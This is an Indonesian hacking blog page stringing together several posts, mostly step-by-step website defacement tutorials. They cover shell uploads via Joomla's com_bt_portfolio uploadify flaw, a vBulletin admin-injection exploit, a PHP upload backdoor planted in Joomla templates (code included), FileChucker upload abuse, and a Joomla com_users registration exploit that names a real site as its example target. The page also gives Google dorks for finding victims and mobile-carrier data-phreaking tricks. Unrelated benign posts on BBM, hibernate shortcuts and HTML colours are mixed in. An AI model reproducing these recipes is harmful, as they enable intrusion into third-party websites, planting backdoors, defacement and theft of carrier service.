Cara Deface Dengan Exploit Com_Bt_Portofolio [uploadify]

Assalamualaikum...

Baiklah, kali ini saya akan share tutor deface dengan Com_Bt_Portofolio.
Baiklah lansung saja.

Bahan-Bahan
1. Script Uploadify ( Download )
2. Xampp ( Download )
3. Curl ( Download )
4. Shell ( Sesuaikan dengan selera anda )

Langkah-Langkah

Dork :    "/templates/bt_foto" 
              "/templates/bt_metro"
              "/templates/bt_folio"
1. Sebelumnya install dahulu Xampp yang sudah kalian download tadi, lalu extract/taruh file ( Curl, Script Uploadify dan Shell ) kalian pada direktori C:/Xampp/php setelah selesai, buka file Script Uploadify-nya lalu sesuaikan seperti gambar di bawah ini :

 

$uploadfile="shell.php"; ( shell.php adalah nama shell yang saya pakai, shell.php bisa diganti dengan nama shell yang kalian taruh di folder php )

2. Langkah selanjutnya adalah kita jalankan Xampp-Nya. ( klik start semua )

 3. setelah itu buka CMD Lalu masuk ke direktori Php pada Xampp. ( Lihat contoh gambar )

4. Jika sudah ikuti langkah diatas, sekarang waktunya jalankan Script Uploadify ( lihat gambar )

5. Jika keluar path seperti diatas, kemungkinan besar shell sudah berhasil terupload, sekarang buka browser lalu ubah urlnya menjadi :
www.target.com/administrator/components/com_bt_portofolio/shell.php

6. nah. dalam kasus ini. shell saya berhasil terupload. sekarang tinggal kalian tebas ^_^

baiklah. sekian tutor dari saya.. kurang lebih nya mohon di maafkan.. dan sebelumnya terima kasih kepada IDCA :)

Baca Selengkapnya...

Trik Noah (not tested) / Luna (tested) yang terbaru

Para admin-admin disini (ada 3 yang pake internet phreak, 1 sudah jarang karena sedang bercinta dengan tab nya :v ) sekarang jarang online dikarenakan malas ngeblog dan akhirnya jadi go-blog :v , jadi saya ambil alih aja :v

Hmm, phreaking, melakukan sesuatu adegan mesum.., ehh salah-salah :v. Di Indonesia sudah sangat sangat sangat sangat sangat tenar dengan phreaking. Siapa suruh operator kasih harga kuota internet mahal dan sedikit, sehingga orang-orang beralih ke cara lain yang lebih mudah dan pastinya lebih bebas karena gak ada kata-kata kuota dan pulsa berkurang (tapi dosa bertambah) :v

Jiahh, malah curhat nih. Gapapa lah curhat sekali-sekali, hehehehehe. Langsung saja trik nya.
Udah tau pasti kan yang mana noah dan luna, admin malas menjelaskannya lagi, untuk mengetahui, silakan googling yah :p.

1. Siapkan kartunya dan pake apn internet
2. Siapkan pulsa 6000 atau 21000 (kalau lagi banyak duit)
3. Ketik WC7 kirim ke 2526 (5500) atau ketik WC30 ke 2526 (20000) (Ketik WC yah, bukan ke WC :v )
4. SSH silakan cari sendiri, tetapi injeknya silakan sedot disitu >>>                      
5. Silakan internetan murah dan bebas kuota ^_^

Special Thanks to Muhammad Nurun Insani :D

Baca Selengkapnya...

Cara membuat WiFi Honeypot di Kali Linux

Pada postingan ini saya akan berbagi bagaimana cara membuat Wifi Honeypot di Kali Linux
Wifi Honeypots adalah sebuah Wifi yang dibuat secara sengaja yang sama persis wifi sebenarnya dengan tujuan untuk menjebak para fakirmiskin bandwidth yang berusaha mencari wireless gratisan, mematikan/jamming/deauth wifi  serta berniat untuk melakukan penyerangan terhadap penguna wireless. Wifi honeypots ini hanya bertujuan mengalihkan perhatian para attacker karena belum mampu menangkap aktivitas yang dilakukan oleh attacker.
Nah, untuk membuat Wifi honeypots di Kali Linux sudah tersedia sebuah tools bernama wifi-honey. Berikut ini langkah-langkah membuat Wifi Honeypots:
1. Start wlan0 pada monitor mode
#airmon-ng start wlan0
2. Aktifikan Wifi Honeypots
Usage: /usr/bin/wifi-honey <essid> <channel> <interface>
#/usr/bin/wifi-honey abrao 6 mon0
Kalau sudah berhasil, hasilnya akan muncul seperti pada gambar dibawah ini:












Sumber

Baca Selengkapnya...

Cara menaikkan QoS XL-Ku

Kali ini saya akan share cara menaikkan QoS XL-Ku, pada jaringan kartu XL-Ku diberikan standard QoS cuman 4Mbps, karena itu diperlukan cara menaikkan QoS agar jaringan lebih ngebut, berikut caranya

1. Minimal pulsa XL-KU yang kamu miliki Rp. 5.000 untuk jaga - jaga
2. Paket XL-KU ke Combo Gila atau ketik di Hp/USSD Modem kamu (*123*4*2*1#)
3. Beli paket Hot Road 3G yang Rp. 1.000 buat satu hari hari (*123*2*2*1*2#)
4. Beli paket Hot Road 3G yang Rp. 500 paketnya 2 kali (*123*2*2*1*1#)
5. Stop langganan paket Hot Road 3G yang Rp. 1.000/1 hari (*123*7*6#)
6. Buat browsing dulu sebentar, buka aja google dulu baru disconnect kan modem.
7. Stop langganan paket Hot Road 3G yang Rp.500
8. Jebret,,, QoSnya udah naik

Baca Selengkapnya...

Cara Share WiFi menggunakan SSH

Kali ini saya akan share tutorial cara membuat WiFi menggunakan SSH, buat kalian yang sering update apps dan game android kalian, trik ini patut dicoba karena tidak perlu ada pengaturan proxy lagi, dan WiFi tersebut bisa digunakan di semua pc dan hp yg support WiFi, langsung saja

Alat Tempur

SocksToTAP ( Download disini )
Connectify hotspot ( Download disini )


Langkah - langkah

• Install Connectify hotspot terlebih dahulu,  masukkan key pas menginstall
• Atur seperti gambar dibawah ini ( jgn di start dulu )

• Konekkan SSH menggunakan inject seperti biasa ( jgn menggunakan proxifier )
• Pada SocksToTAP, Buka menggunakan Run as administrator
• Kemudian pilih Operator sobat
• Pada Socks port di SocksToTap, isikan seperti Listen port di bitvise

 

• Klik Start. Jika adapter agan belum terinstall, maka agan akan menginstall OpenVPN
• Setelah OpenVPN terinstall SocksToTAP akan keluar, maka buka lagi dan klik Start
• Jika tahap di atas udah benar, masuk ke connectify hotspot, isikan nama hotspot dan password dan klik start, maka WiFi sudah siap digunakan tanpa setting-setting lagi di PC dan HP pengguna

Baca Selengkapnya...

vBulletin 4.x.x and 5.x.x Upgrade 0day Exploit

Hallo sobat.. kali ini saya akan share Exploit vBulletin ya meskipun sudah banyak yang tau.. tapi gak apa-apa sih.. yang penting bisa post.

Ok Lansung saja
[+] Dork [+]
inurl:install/upgrade.php *dork silahkan kembangkan ya ^_^

[+] Bahan [+]
vBullein 0day ( Download )Silahkan upload di hosting kalian ^_^

[+] langkah-langkah [+]

1. Masukan expoit : /install/upgrade.php
#localhost/path/install/upgrade.php

 2. Kemudian CTRL+ U Dan cari customer ID nya dengan bantuan CTRL+F

3. Setelah itu buka vBulleting 0day yang sudah anda upload ke hosting anda. lalu isi data-datanya
note: username dan password terserah anda

4. Setelah itu klik inject admin. jika berhasil maka tampilan akan seperti berikut.

5. nah. langkah terakhir tinggal login. login admin vBulleting adalah /admincp
contoh : www.site.com/admincp

sekian tutor dari saya.. semoga berguna ^_^

Baca Selengkapnya...

Cara Memasang Shell Di Joomla

Cara memasang shell di joomla - Bagaimana cara menebas index di web joomla? terdapat dua cara untuk menebas index di web joomla. yang pertama ke template manager lalu ganti script web tersebut dengan script deface anda. dan yang kedua adalah dengan memasang shell lalu tebas index.php nya. Dan kali ini saya akan menjelaskan cara yang ke dua. yaitu menebas index melalui script.

[+] Bahan

• shell ( download here )

[+] Langkah-Langkah

1. Login ke halaman administrator dari site target and (  www.site.com/administrator  )

 

2. Selanjurnya klik template manager yang ada di halaman utama, maka  akan muncul tampilan seperti pada gambar.

 

3. klik template administrator yang aktif ( yang aktif terdapat tanda bintang ) setelah itu klik template.

4. klik judul pada template yang aktif tadi

5. lalu klik edit main page templates

6. setelah itu. taruh script di bagian bawah lalu klik save seperti pada 

    gambar di atas.

<?php

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Sukses!!!<b><br><br>'; }
else { echo '<b>Gagal Upload!!!</b><br><br>'; }
}
?>

7. Setelah Save berhasil, akan muncul fasilitas untuk mengupload shell. ( terdapat di paling bawah halaman administrator ). Lalu pilih file shell kamu.

jika sukses akan ada tulisan upload sukses

8. Masuk ke dalam shell kamu ( site.com/administrator/Nama shell kamu.php ) Lalu cari tulisan index.php dan klik pada tombol edit

 

Sekian tutor dari saya.. semoga membantu \ :v /

Baca Selengkapnya...

Exploit FileChucker File Upload Vulnerability

Hallooo sobat.. kali ini saya akan berbagi trik. ya meskipun cara lama dan kurang di minati. yang penting bisa sekedar nambahin unique deface di Arsip \ :v /

Dork :
intext:Toptown File Upload

inurl:/cgi-bin/filechucker.cgi

inurl:/cgi-bin/filechucker.pl
intext:File Upload by Encodable

1. Baiklah.. langkah pertama adalah kita mencari target.

 

 2. Langkah selanjutnya adalah pilih target. jika sudah memilih maka akan keluar tampilan seperti berikut.

 3. setelah itu isi fieldnya dan browse ju

ga script kalian.

5. Setelah itu begin upload..

    Note: File yang bisa diupload yaitu .htm, .html, .txt, .jpg, .gif

6.  setelah berhasil seperti gambar di atas...  kita tinggal cek http://site.com/upload/files/file_mu

 

nah sekian tutor nya.. 

Baca Selengkapnya...

Mencari config dalam website

Haloo !! Ketemu lagi sama ane.

Kali ini aku mau kasih trik cara mendapatkan web yang 1 server sama web yang kita sudah pasang shell, atau lebih di kenal dengan sebutan  [+] CONFIG [+]

ok lansung saja kita simak tutornya


[+] Bahan [+] 

•  Shell ( yang belum punya bisa download Di sini )
•  MySQL ( yang belum punya bisa download Di sini ) #recode

1. Siapakan website yang sudah kalian tanami shell.
   sebagai contoh. perhatikan gambar di bawah.
2. Selanjutnya adalah.. Kalian klik EVAL Di dalam shell kalian.
   
   

  

3. Jika sudah, selanjutnya tekan go seperti gambar di bawah.

 

4.  Setelah itu. Copy semua yang terdapat pada kolom tersebut. 

5.  Next. Kalian klik config, dan akan muncul tampilan seperti ini.

 

6. Setelah itu paste kode yang kalian dapatkan pada step - 4 di kolom yang di sediakan. lalu klik hajar seperti gambar di bawah

7. nah jika berhasil tampilannya akan seperti pada gambar di bawah

8. nah, jika sudah done !! , saat nya kita memanggil CONFIG nya. caranya adalah dengan mengganti nama shell kalian dengan config.

Contoh : www.site.com/shell.php --> www.site.com/config. jika sukses maka tampilan akan seperti ini.

9. Sekarang tinggal upload script "mysql.php"nya \ :v /

Sekian tutornya. semoga bisa bermanfaat \ :v /

Baca Selengkapnya...

Cara Mengatasi BBM Android yang Stuck di Proses Setting Up

Ada beberapa masalah yang sering dialami pengguna BBM baru, salah satunya adalah stuck di proses Setting Up BBM. Bagi pengguna Android dengan arsitektur Armv6 dan OS Gingerbread yang baru saja kebagian jatah BBM mungkin banyak juga yang mengalaminya.

Penyebab

1. Tanggal, jam, atau tahun tidak diatur secara benar, sehingga mengakibatkan gagalnya koneksi ke server BBM
2. Perangkat tidak bisa terhubung ke BBM Infrastructure
3. Ada beberapa setting Android yang mengganggu proses Setting up BBM

Cara Mengatasi

1. Atur waktu secara tepat ( jam, tanggal, tahun ), serta perhatikan pemilihan zona waktu. Untuk Indonesia, gunakan GMT+7. Untuk mengaturnya bisa melalui menu Setting > Date & time
2. Pastikan perangkat terkoneksi internet dengan baik. Gunakan koneksi yang cepat, terkadang proses ini tidak berjalan karena koneksi yang sangat lambat
3. Coba gunakan koneksi lain, misalkan Wi-Fi yang bisa menggunakan port 443, karena proses ini memanfaatkan port tersebut

Baca Selengkapnya...

Cara Install BBM di Android Gingerbread Armv6

Sejatinya, Official BBM untuk Android Gingerbread akan dirilis BlackBerry sekitar Bulan Februari mendatang, namun saat ini aplikasi versi BETAnya sudah mulai beredar, dan banyak pengguna yang bisa menginstall ke android mereka, salah satunya pada Samsung Galaxy Young S5360 ( Galyoung 1 )

Screenshot aplikasi BBM yang berjalan di Galyoung sudah banyak bermunculan. Bagi pengguna yang telah sabar menunggu kehadiran BBM yang support untuk Galyoung, mungkin sekarang saatnya untuk mencoba menginstall aplikasi messenger favorit ini

Bahan

BBM.apk ( Download disini )

Cara Install

1. Download BBM.apk
2. Install seperti biasa
3. Setelah proses install selesai, buka aplikasi BBMnya
4. Jika stuck di Setting Up bisa dilihat tutorialnya disini

NB : Tidak khusus untuk Galaxy Young, tapi juga bisa untuk Android Gingerbread Armv6 lainnya

Baca Selengkapnya...

Cara deface web dengan metode Com_User

Alat Tempur

• Exploit Joomla ( Download disini )

Langkah - langkah

• Cari web target di google dengan dork dibawah ini ( dork bisa dibuat sendiri )

Powered by Warp Theme Framework joomla site:rs
Powered by Joomla k2 site:rs
Joomla Templates - by Joomlage.com site:rs
Powered by joomlashine site:mk
Joomla template freaks site:gr
Powered by Joomla templates by SiteGround
site:rs build joomla
site:rs Using Joomla! 
joomla24  site:rs
Joomla 2.5 Templates designed by Joomla Web Design site:rs
Joomla template created with Artisteer. site:rs
Joomla Templates by Joomla51.com
Joomla templates by a4joomla
Joomla Templates by Joomla-Monster.com site:Rs
joomla Powered by T3 Framework site:Rs
Joomla Templates by ZooTemplate.Com. site:Rs
Joomla Templates By JM-Experts! site:rs
Design by Youjoomla.com site:rs
Designed by Shape5.com Joomla Templates site:rs
Designed by free-templates.lt. site:rs
inurl:/index.php/joomla-pages-ii/password-reset
inurl:/index.php/joomla/ site:rs
template designed by lernvid.com site:Rs
FaLang translation system by Faboba site:rs
"youjoomla" site:rs
Built with HTML5 and CSS3 joomla site:rs

Penjelasan:

*site: boleh diganti dengan com/ ca/ it/ za/ id/ ru dll (terserah anda)

intitle  berarti, kata yang terkandung dalam judul sebuah Web.

intext berarti, kata yang terkandung didalam web tersebut.

site berarti, domain yang digunakan oleh web tersebut. ca=Canada ru=Russia dan sebagainya. 

• Cari web yang vuln, karena tidak semua web bisa di deface dengan metode ini, itu melihat web vuln atau tidak, masuk ke administratornya dengan cara mengetik www.namasite.com/administrator (contoh www.paradiseballrooms.com/administrator )

  
  
   
  
  
  Gambar diatas merupakan site Vuln
  
  
  

               Gambar diatas merupakan site "Joomla yang samar-samar"

  Note: "Perbedaan Site Vuln dengan yang lainnya, terlihat pada bagian bawah atau footer Admnistration Login pada web Joomlanya." 

Web yang saya namakan "samar-samar" itu bukan berarti sitenya tidak tidak bisa di deface/ tidak vuln, hanya saja web yang seperti itu peluangnya dapat di defacenya  hanya 5% dari keseluruhan web joomla seperti gambar diatas.
Pastikan Web yang anda ingin deface adalah web yang vuln. karena web yang vuln 60% nya bisa di deface.

• Setelah menemukan site yang vuln. masukkan exploit berikut di belakang sitenya

          index.php?option=com_users&view=registration

misal, web yang akan saya deface adalah paradiseballrooms.com. maka, saya harus menambahkan exploit di belakang alamat web tersebut menjadi paradiseballrooms.com//index.php?option=com_users&view=registration

• Setelah memasukkan exploit diatas, anda akan masuk ke tempat registrasi

• Setelah masuk ke tempat registrasi seperti gambar diatas. maka langkah selanjutnya adalah menekan tombol ctrl+u. dan akan muncul tampilan seperti gambar di bawah. Cari kode hidden (dengan ctrl+f ) dan cari kode seperti gambar di bawah ini.

• Copy code yang di beri kotak merah tersebut ke Exploit Joomla yang telah kamu download tadi.
• Buka Exploit Joomla yang telah kamu download tadi dengan Notepad. Lalu kamu paste kode yang telah kamu copy tersebut dikotak merah kedua (yang di paling bawah). Dan masukkan alamat web yang telah di exploit tersebut contoh : http://paradiseballrooms.com/index.php?option=com_users&view=registration ke kotak merah pertama yang terdapat di tempat paling atas.

*Jangan lupa ganti alamat email dan username kamu (di exploit joomla )

*Password dibiarkan berbeda (di exploit joomla )

• Save file tersebut lalu buka exploit joomla tersebut di browser anda

• Setelah di buka, maka akan muncul tampilan seperti gambar di bawah ini.

• Setelah di buka dengan web browser dan muncul tampilan seperti gambar berikut. Lalu langkah selanjutnya adalah klik tombol Register yang terdapat di bagian bawah.

• Lalu akan ada tulisan password yang anda masukkan tidak sama. (kalau di bahasa indonesia kan)

• Ganti password tersebut (terserah anda) dan klik register kembali.

• Setelah sukses, buka alamat link aktivasi yang terdapat di email anda.

*Jika alamat link aktivasi tidak masuk ke INBOX sebuah web, coba lah lihat di halaman SPAM. Dan jika tidak masuk kedua-duanya, cobalah reload/refresh email anda.

• Setelah di klik link aktivasi pada email, maka anda telah menyelesaikan registrasi. dan anda bisa login kedalam halaman administrator. (tambahkan kode /administrator di belakang alamat web tersebut)

*misal alamat web nya adalah http://paradiseballrooms.com/ maka anda harus menambahkan /administrator di belakang web nya. seperti http://paradiseballrooms.com/administrator/

• Setelah itu anda masukkan username dan password, lalu login.

• Sekarang anda sudah masuk kedalam halaman adminnya dan tinggal di tebas indexnya.

*Ada 4 kemungkinan GAGAL untuk web yang menggunakan CMS Joomla:

1. Web telah menghapus laman Registration Form.

2. Alamat Activation Link tidak masuk kedalam email.
3. User sudah diaktifkan tetapi kita tidak bisa masuk kedalam administrator panel tersebut.

4. Template tidak bisa di di ubah.

Baca Selengkapnya...

Cara membuat Hibernate

Baiklah. sesuai dengan title nya. kali ini saya akan post cara membuat Hibernate. Hibernate ini berfungsi untuk mematikan komputer untuk sementara, jadi saat kita menyalakan komputer, windows tidak akan melakukan proses booting lagi dari awal, tapi akan langsung ke posisi anda sebelumnya.

baiklah.. lansung saja

• Klik kanan pada desktop

• Pilih new lalu pilih shortcut

• Pada kolom type the location of the item isikan kode di bawah ini

%windir%\system32\rundll32.exe PowrProf.dll, SetSuspendState

• setelah itu klik next

• Lalu beri nama Hibernate

• Dan proses terakhir, klik finish

Kini anda sudah bisa melakukan proses hibernate pada komputer anda dengan cara mengklik shortcut tersebut
Sekian dan semoga bisa membantu \ :v /

Baca Selengkapnya...

kode warna biru pada html

Baiklah.. Kali ini saya akan post kode-kode warna yang biasanya di gunakan pada html. ok lansung saja !! ^_^ semoga membantu..

Kategori : Blue 

Blues
Color	Red	Green	Blue	Hexa Code	Sample
alice_blue	240	248	255	#F0F8FF	Sample
blue	0	0	255	#0000FF	Sample
blue_light	173	216	230	#ADD8E6	Sample
blue_medium	0	0	205	#0000CD	Sample
cadet	95	158	160	#5F9EA0	Sample
cobalt	61	89	171	#3D59AB	Sample
cornflower	100	149	237	#6495ED	Sample
cerulean	5	184	204	#05B8CC	Sample
dodger_blue	30	144	255	#1E90FF	Sample
indigo	8	46	84	#082E54	Sample
manganese_blue	3	168	158	#03A89E	Sample
midnight_blue	25	25	112	#191970	Sample
navy	0	0	128	#000080	Sample
peacock	51	161	201	#33A1C9	Sample
powder_blue	176	224	230	#B0E0E6	Sample
royal_blue	65	105	225	#4169E1	Sample
slate_blue	106	90	205	#6A5ACD	Sample
slate_blue_dark	72	61	139	#483D8B	Sample
slate_blue_light	132	112	255	#8470FF	Sample
slate_blue_medium	123	104	238	#7B68EE	Sample
sky_blue	135	206	235	#87CEEB	Sample
sky_blue_deep	0	191	255	#00BFFF	Sample
sky_blue_light	135	206	250	#87CEFA	Sample
steel_blue	70	130	180	#4682B4	Sample
steel_blue_light	176	196	222	#B0C4DE	Sample
turquoise_blue	0	199	140	#00C78C	Sample
ultramarine	18	10	143	#120A8F	Sample

Baca Selengkapnya...